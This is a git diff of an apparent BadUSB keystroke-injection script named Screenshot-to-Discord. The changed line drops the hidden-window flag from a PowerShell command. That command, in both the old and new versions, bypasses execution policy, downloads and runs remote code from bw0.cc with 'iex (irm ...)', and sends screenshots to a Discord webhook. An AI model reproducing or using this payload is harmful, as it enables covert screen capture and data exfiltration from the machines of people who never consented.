diff --git a/Screen-to-Discord/Screenshot-to-Discord.txt b/Screen-to-Discord/Screenshot-to-Discord.txt index 0f1661b..d368851 100644 --- a/Screen-to-Discord/Screenshot-to-Discord.txt +++ b/Screen-to-Discord/Screenshot-to-Discord.txt @@ -15,7 +15,7 @@ REM open powershell (remove "-W H" to show the window) DELAY 1000 GUI r DELAY 750 -STRING powershell -Ep Bypass -W H -C $dc='DISCORD_WEBHOOK_HERE'; iex (irm bw0.cc/dcss) +STRING powershell -Ep Bypass -C $dc='DISCORD_WEBHOOK_HERE'; iex (irm bw0.cc/dcss) ENTER